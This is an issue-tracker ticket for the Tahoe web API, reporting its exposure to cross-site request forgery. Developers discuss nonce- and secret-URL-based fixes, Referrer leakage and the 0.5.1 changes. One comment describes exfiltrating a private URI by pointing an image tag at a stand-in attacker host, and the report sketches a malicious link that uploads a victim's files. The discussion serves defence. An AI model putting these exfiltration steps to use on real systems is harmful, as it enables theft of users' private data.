#98 closed defect (fixed)

Web API is vulnerable to XSRF attacks.

Reported by: nejucomo Owned by: zooko
Priority: major Milestone: 0.5.1
Component: code-frontend-web Version: 0.4.0
Keywords: security Cc:
Launchpad Bug:

Description

the current web-api is susceptible to cross-site reference forgery (XSRF) attacks [1].

An example attack scenario looks like this: The attacker expects the victim to be a Tahoe user and wants to read their harddrive, and knows they have a fetish for nuclear warhead HOWTO / porn mashups.

So they create NudieNukeHOWTOS.com and put an enticing link text with a url target that PUT's the user's root directory to Tahoe.

In order to prevent this kind of attack requires (I believe) that users cannot cut'n'paste URLs into their browser to initiate Tahoe actions. This might explicitly be counter to the design goals. A workaround is to require the users to cut'n'paste into an entry form within the web UI (see below).

One technical solution is for the Web UI and API to associate an unguessable string with each action-triggering URL. These strings are provided to the browser (such as with a hidden input field) or the webapi client (perhaps in a header) and verified before executing actions.

If we want the use case of Alice sending Bob an email that says: "Hey download my great Tahoe photo directory with this URI: ...", we can require Bob to paste this string into an input field in the Web UI *instead* of the location bar. (Even this might be vulnerable... I'm not sure of the capabilities of javascript and the like...)

References: [1] http://en.wikipedia.org/wiki/XSRF

Change History (23)

comment:1 Changed at 2007-08-10T23:09:49Z by warner

Hm. I believe that browsers can't do PUT or DELETE (only GET and POST), so this might be a good argument for not having the localfile= argument on those methods (certainly on GET, since anyone can make you do a GET, but that's why GET is never supposed to have side effects anyways).

So if GETs are side-effect free, and the javascript same-origin policy prevents other site's javascript from reading your local data, and browsers can't do PUT or DELETE, then I think the only attack vectors left are POSTs.

That would mean the attack is my web page which has a form on it with an action that points at your local tahoe node and does something (like use localfile= to upload files from your disk into the vdrive somewhere that I can read them, or perhaps just cause your node to delete your root directory). This strikes me as a more general problem.. pretty much every large web site out there has actions that are triggered by form POSTs.. how do they protect against other sites pointing forms their way? Do browsers complain if the form you serve doesn't point back at your own site? How do others deal with this?

Ohh.. but at the moment, the localfile= form of GET *does* have side-effects, namely writing to your local disk. So an attacker could easily cause you to modify your local filesystem. I had thought I'd put in some weak protection against the most obvious exploits of this (refuse to overwrite existing files), but in looking through the code, it seems that I'm remembering incorrectly.

So at the very least, we need to remove the localfile= form of GET.

comment:2 Changed at 2007-08-11T01:56:54Z by warner

I've disabled the localfile= form of GET and PUT in 42f8e574169b87a7, and you must touch a special file named webport_allow_localfile in the node's basedir to reenable them. (they're awfully useful for testing, so I didn't want to get rid of the feature completely).

So that takes care of any localfile= issues. What's left?

comment:3 Changed at 2007-08-13T17:09:46Z by zooko

  • Milestone changed from undecided to 0.5.0
  • Owner changed from somebody to nejucomo

I'd like for somebody to review this issue before we release v0.5. Assigning it to Nejucomo.

comment:4 Changed at 2007-08-13T17:10:13Z by zooko

  • Priority changed from minor to major

comment:5 Changed at 2007-08-14T18:54:07Z by warner

  • Component changed from code to code-frontend-web

comment:6 Changed at 2007-08-15T15:47:14Z by zooko

I think Brian is right that this is a very general problem in web sites/web services. For example if you visit this web page while you are logged into your amazon account, it will add a book to your amazon shopping cart:

http://shiflett.org/amazon.php

The capabilities perspective on XSRF attacks is that they are Confused Deputy Attacks. That is: your client (the web browser) is asking the server (the tahoe node or the amazon web server) to do X, and the web browser has the authority to do X, but the web browser shouldn't have used that authority at that time.

This happens because the authority is "ambient" within the scope of a "session" or a cookie or some other such authorization scope -- whatever requests are made within that scope are made with all of the client's authority.

For example, when amazon receives a request from your web browser to add a book to your shopping cart, it decides whether to honor the request based on whether your web browser is currently "logged in" to amazon. When a tahoe node receives a POST from your web browser to alter your vdrive, the tahoe node decides whether to honor the request based on whether the browser has authenticated (I guess -- I don't understand how or if we currently do authentication). The problem is that the browser is not used *solely* for that one purpose (amazon shopping or tahoe usage), so if the other purposes for which it is used lead to the user clicking on a link that was influenced by an attacker, this kind of attack can succeed.

A capabilities-inspired solution to this problem would be to make a narrower authorization. For example, below I elaborate on nejucomo's "unguessable string" suggestion:

When the tahoe node starts up, it emits a URL containing an unguessable random string into a file in its dir. The user has to cut and paste that URL into her web browser in order to use the tahoe node. For the duration of this run of the node process, it requires that same unguessable random string to be present in all HTTP requests that it receives. With this scheme, then even if the user uses their web browser for other purposes at the same time as they use it for tahoe, and even if a malicious person gives them a hyperlink that was designed to abuse their tahoe authorities, or even if they load a web page containing javascript like the "amazon.php" attack referenced above, then the malicious person can't cause them to use their tahoe authorities since the malicious person doesn't know the unguessable string.

Is that right so far?

I believe nejucomo has recently studied this topic and he may have a better idea.

comment:7 Changed at 2007-08-15T15:48:12Z by zooko

I'm starting to have confidence that the webapi that we have now is good enough/safe enough for v0.5. I still would like for nejucomo to look at it for a few minutes just to see if there is something that could be a serious issue in the short term.

comment:8 Changed at 2007-08-15T17:21:32Z by warner

I like the nonce idea. Several people have pointed out that URLs are leaky (referrer headers, anti-phishing toolbars, etc), but I think having the authority embedded in the URL is a lot better than having it be ambient in the browser.

If the nonce is stable over time, then users can bookmark their favorite sites. If not (if each session generates a new one or something), then if we want to do password-based authentication on the local system (or maybe even a remote system, although URLs get a lot leakier when you tell someone else about them..) then we could arrange for an old nonce to ask for authentication in some non-ambient-authority-creating way and then bounce you to the new nonce, i.e. http://LOCALHOST/NONCE1/path sends you to http://LOCALHOST/login?path_when_done=path which asks for a password then sends you to http://LOCALHOST/NONCE2/path .

The nonce in this scenario represents authority to access the user's entire vdrive: that is a good thing and a bad thing. The good thing is that it means the user can navigate to parent directories and generally get random-access to their whole vdrive. The bad thing is that they can't safely share web access to a limited portion of the vdrive (but that's what the "here's the URI you should share with someone else" link is for).

How about this for a post-0.5.0 release?:

  • we create a persistent nonce the first time the webapi port is used
  • write that to disk in a human-readable format in a well-known file
  • change the welcome page to replace "click here to visit your vdrive" links with a small form
    • the form tells you the full pathname to the nonce file, and tells you to paste the nonce into this box
    • the form has one button for "visit my personal vdrive" and a second for "visit the global vdrive".
    • the code behind the form just redirects you to a URL that has the nonce added as a prefix
  • we also change the directory.xhtml page to make the "go back to the Welcome Page" link go up one more level, to get over the nonce part of the URL

This would deny local vdrive access to the providers of remote pages (those who do not know the nonce), but still leave an affordance for a local user to hit a simple (non-random) web page and receive instructions on how to access their vdrive. I think it makes access to the vdrive equivalent to access to the node's basedir, which is exactly the correspondence we want.

comment:9 Changed at 2007-08-15T18:33:27Z by warner

  • Milestone changed from 0.5.0 to 0.6.0

comment:10 Changed at 2007-08-16T18:38:55Z by warner

robk mentioned a technique they used back at Yahoo involving "crumbs", and has promised to add a note here with some details.

comment:11 Changed at 2007-08-20T19:45:51Z by nejucomo

I don't see the need for the complicated bootstrapping procedure when using noncey URLs. We may be able to preserve some user-friendliness while preventing XSRF attacks.

For instance, if the user is authenticated with a persistent cookie, we could provide the main top-level page without requiring a nonce. This would be safe as long as loading this page causes no Tahoe operations to be performed. This page would insert the nonce into each link it exposes.

Thus, an XSRF attack could only direct a user to the main page, but could not perform actions. The benefit here is that the user can bookmark the main page, or type it in, or follow a link on an instructional page.

comment:12 Changed at 2007-08-20T20:56:27Z by zooko

See related issue in ticket #52.

comment:13 Changed at 2007-08-21T22:09:34Z by zooko

  • Owner changed from nejucomo to zooko
  • Status changed from new to assigned

As per this discussion:

http://allmydata.org/pipermail/tahoe-dev/2007-August/000108.html

I intend to fix this ASAP and build a v0.5.1 release.

comment:14 Changed at 2007-08-21T23:13:05Z by zooko

Brian and I discussed nejucomo's simplification on IRC and we don't get it: couldn't javascript-enabled attackers fetch the welcome page, parse it, and then attack the user's data?

Oh, but non-javascript-enabled attackers couldn't.

Am I right?

comment:15 Changed at 2007-08-22T19:46:12Z by nejucomo

I'm not aware of a means for Javascript from host Malicious.com to fetch a page from TargetSite?.com, parse it, and respond to it. But, I certainly wouldn't be surprised if that were possible. (My knowledge of Javascript and web front-end technologies is limited, but growing because of this issue.)

In the example attack, the only purpose of the Java script is to conceal a POST. The same attack is possible without Javascript, the main difference is that the user must be tricked into clicking a "submit" button. (Who knows, perhaps with CSS or some such, the POST could be concealed without Javascript.) It's important not to be confused about Javascript's role here. It does not "cause" any web requests. It just decorates a normal request to make the nature of the attack more obscure.

Is it possible for an XSRF attack to send a GET request to Tahoe, then redirect from that page to a second attack site which somehow snarfs private Tahoe data? (For example, if the main page is unprotected with a nonce, but has links to protected pages, is it possible to cause the browser to load that page and reveal the secrets to the attacker?)

I don't *think* this is possible, which leads me to suggest we follow this principal:

XSRF Defence Principal: Any URL which initiates a Tahoe action, or any Tahoe page which causes browser actions without user interaction, must be protected with a shared secret. Any *other* Tahoe URL may be bare and unprotected with a secret (for user-friendliness).

So for instance, an un-guarded URL should not accept any parameters whatsoever, but may have constrained side-effects (such as generating a new random nonce).

comment:16 Changed at 2007-08-22T20:10:34Z by nejucomo

So most secure and least user-friendly solution I imagine is this:

S1. There is one unguarded URL which serves up an authentication page (with a CAPTCHA for good measure).

S2. Whenever *any* page loads it generates a unique nonce for *every* Tahoe URL contained in that page.

S3. Tahoe maintains a table of noncey urls and related actions. Each entry is removed after a single use, or after a given timeout. (This mitigates URL leakiness.)

This has several drawbacks: No bookmarks, no human modification of location bar, lot's of repeated authentications.

It sounds like the suggested deviations from this most-secure approach address different drawbacks with trade-offs:

  1. Use a single persistent nonce, that is refreshed under certain (which?) conditions. This allows bookmarking and user location modification.
  1. Use no authentication whatsoever on the "authentication page" (making it a simple portal). This removes the need for frequent authentication, but may be vulnerable to XSRF.
  1. Make all inter-Tahoe UI actions and traversals into POSTS where the nonce is a hidden parameter. This is a user-friendliness feature. (This makes the URL's appear succinct and human readable, and the user or another site may link to a specific action. If the nonce is missing, they are redirected to a login page explaining which action is about to be performed.)

Are there other deviations from the "most secure" approach, or complete alternatives we should consider?

comment:17 Changed at 2007-08-23T00:24:06Z by warner

After chatting with zooko about secrets, I've implemented the following change:

  • remove /vdrive/private from the web API
  • create a "start.html" file in BASEDIR at node startup, containing a brief welcome message and links to the following:
    • the welcome page (just a simple http://localhost:8080/ link)
    • the public vdrive (/vdrive/global)
    • the URI-based private vdrive root (/uri/$PRIVATE_URI)

This accomplishes the basic goal: making access to the private vdrive contingent upon knowing something secret. An attacker who can get control of the browser via any http-sourced page will be unable to determine learn $PRIVATE_URI, so they won't be able to access or modify anything through it. XSRF attacks against /vdrive/global are still possible, but the attacker could just as easily modify the public vdrive through their own node: they get no additional abilities by using the victim's node.

The concern with javascript is an XSS thing: the assumption is that a page served by a "trusted" server will contain content under the control of the attacker, specifically a piece of javascript that runs in the context of the "trusted" page. This JS is then able to make HTTP requests (via the usual XMLHTTPRequest mechanism used for AJAXy stuff) to anything from the same server, and those requests will be accompanied with any host-specific authority-bearing cookies.

Plain HTML is a concern as well, as nejucomo's example shows, when the POST or GET has side-effects. Plain HTML has no way to take the information it has learned and share it with others, whereas an active attack (javascript) does.

In our case, the XSS attack to be concerned about is one against the authority contained in the URL, specifically that /uri/$PRIVATE_URI portion. If an attacker can convince you to attach an .html file to your private vdrive somewhere and then view it, any javascript in that file gets control. It can read the current URL, extract the $PRIVATE_URI portion, then reveal that data to an external server (say, by changing the source= on an embedded IMG tag to refer to http://attacker.example.org/0wned.jpg?secret=$PRIVATE_URI).

To mitigate this problem, the next change I'm about to make is to modify the way that we present certain files in the web directory view to remove the authority from the URL. In each directory, we present a list of child names as hyperlinks, either to another directory or to the file attached to that name. With this change, the hyperlinks for files will point at /uri/$FILE_URI?t=$FILENAME instead of pointing at .../$FILENAME . The effect of this will be that the javascript/etc will still run, but there will be nothing interesting or secret left in the URL that it can usefully reveal.

This addresses another problem, URL leakage through Referrer headers. If the user follows any hyperlink present on a /uri/$PRIVATE_URI page, that request will carry the page's URL in the Referrer header, revealing the secret to the new web server. By insuring that all HTML content renders in a different page (with no authority in the URL), this problem is fixed.

I'm planning to leave the .../file.html URL working (so that simple 'wget' operations like /uri/$PRIVATE_URI/subdir/foo.html still work and don't mangle the downloaded filename). This change will only cause the directory node navigation page to provide alternative HREFs for children which are files.

comment:18 Changed at 2007-08-23T00:41:43Z by warner

I've just pushed the second change I mentioned earlier, to present /uri -based urls for all files in the vdrive.

It could use some improvement, though, in particular I'm displeased that the URL you can cut-and-paste out of the HTML page ends in a big ugly hex string, such that when you pass it to 'wget', you get a file on disk with a useless big name.

I think I want to implement a URL which contains the tahoe file URI as the second-to-last component, but then contains the desired filename as the last component, like http://localhost:8080/uri/$URI/foo.jpg . The server would deliver the same file no matter what name you tack on the end, but this way tools like wget could use a sensible name instead of $URI.

Our present webapi doesn't accomodate this, though, since the /uri/$URI/ form can refer to directories too, in which case /uri/$URI/foo.jpg really means to look inside the directory referenced by $URI for a child named foo.jpg and serve that. So we need a new URL space, maybe /download or /download-uri or /uri-file or something.

comment:19 Changed at 2007-08-23T00:42:38Z by warner

  • Milestone changed from 0.6.0 to 0.5.1

comment:20 Changed at 2007-08-30T23:33:33Z by warner

We released 0.5.1 a week ago. Are we happy enough with the fixes therein to close this ticket? I'd like to mark the trac 0.5.1 milestone as done, but this is the last ticket remaining.

comment:21 Changed at 2007-09-23T14:17:09Z by zooko

  • Resolution set to fixed
  • Status changed from assigned to closed

Whoops, I forgot to mark this as fixed in the v0.5.1 release.

I wish trac would send me e-mail. I suspect that my habit of "checking the TimeLine? for new stuff" isn't good enough to notice all the trac events that I want to notice.

comment:22 Changed at 2009-10-28T03:51:46Z by davidsarah

Note that JavaScript in a given file can still obtain the read URI for that file. In the case of a mutable file, this is more than least authority because it allows reading future versions. I will open a new bug about that.

comment:23 Changed at 2009-10-28T04:04:29Z by davidsarah

New bug is #821.

Note: See TracTickets for help on using tickets.